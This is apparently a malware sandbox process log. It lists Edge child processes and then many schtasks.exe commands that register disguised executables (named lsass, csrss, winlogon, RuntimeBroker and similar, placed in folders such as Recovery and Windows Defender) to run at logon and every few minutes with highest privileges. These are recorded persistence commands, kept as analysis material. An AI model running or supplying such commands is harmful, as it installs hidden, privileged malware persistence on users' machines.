    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2768 /prefetch:2
    3⤵
    PID:8036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
    3⤵
    PID:6820
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
    3⤵
    PID:7476
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3952 /prefetch:2
    3⤵
    PID:1176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3660 /prefetch:2
    3⤵
    PID:2936
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3660 /prefetch:2
    3⤵
    PID:6184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1120 /prefetch:2
    3⤵
    PID:6516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
PID:5932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\firefox.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
PID:5184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\firefox.exe'" /f
1⤵
PID:5536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\firefox.exe'" /rl HIGHEST /f
1⤵
PID:2872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\firefox.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラックク" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\クラック.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラック" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\クラック.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\WmiPrvSE.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラックク" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\クラック.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
1⤵
PID:6020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
1⤵
PID:6204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\5e710462c65fe899466e4fb7c1e33c9a.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Happy18H" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\Happy18.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6184 -ip 6184
1⤵
PID:6640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a" /sc ONLOGON /tr "'C:\Users\Default\SendTo\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
1⤵
PID:7060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Happy18" /sc ONLOGON /tr "'C:\Users\Default User\Happy18.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラックク" /sc MINUTE /mo 12 /tr "'C:\Users\Default\NetHood\クラック.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラック" /sc ONLOGON /tr "'C:\Users\Default\NetHood\クラック.exe'" /rl HIGHEST /f
1⤵
PID:5240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files\Google\Chrome\Application\Idle.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラックク" /sc MINUTE /mo 12 /tr "'C:\Users\Default\NetHood\クラック.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Happy18H" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Happy18.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Windows\LiveKernelReports\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\Panther\UnattendGC\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Panther\UnattendGC\csrss.exe'" /rl HIGHEST /f
1⤵
PID:4748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\Client.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\Panther\UnattendGC\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Windows\LiveKernelReports\dwm.exe'" /rl HIGHEST /f
1⤵
PID:5808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "7f1630df6b57af024a3b561bdadc208f7" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\Temp\7f1630df6b57af024a3b561bdadc208f.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Windows\SchCache\spoolsv.exe'" /f
1⤵
PID:5960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Client" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Client.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\SchCache\spoolsv.exe'" /rl HIGHEST /f
1⤵
PID:5256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "7f1630df6b57af024a3b561bdadc208f" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\7f1630df6b57af024a3b561bdadc208f.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Windows\SchCache\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "7f1630df6b57af024a3b561bdadc208f7" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Google\Temp\7f1630df6b57af024a3b561bdadc208f.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\firefox.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Client.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Sidebar\OfficeClickToRun.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6672

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Users\Default User\firefox.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Sidebar\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Public\AccountPictures\System.exe'" /f
1⤵
PID:6484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\5e710462c65fe899466e4fb7c1e33c9a.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Users\Public\AccountPictures\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:8012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:8168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jkv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Java\jre-1.8\virus.jk.jk.exe'" /f
1⤵
PID:6480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Java\jre-1.8\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jk" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\virus.jk.jk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
PID:7396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\RuntimeBroker.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jkv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Java\jre-1.8\virus.jk.jk.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\Windows\LiveKernelReports\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\5e710462c65fe899466e4fb7c1e33c9a.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Windows\LiveKernelReports\sysmon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\it-IT\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\firefox.exe'" /f
1⤵
PID:7412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\firefox.exe'" /f
1⤵
PID:8020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\it-IT\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\firefox.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Users\Default User\firefox.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Defender\kosomk.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\firefox.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Windows\it-IT\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\firefox.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\firefox.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\firefox.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c2" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\firefox.exe'" /rl HIGHEST /f
1⤵
PID:7712

C:\Windows\system32\schtasks.exe
